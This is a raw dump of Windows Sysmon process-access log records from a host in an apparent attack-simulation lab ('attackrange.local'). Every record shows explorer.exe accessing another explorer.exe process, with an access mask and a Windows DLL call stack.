16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 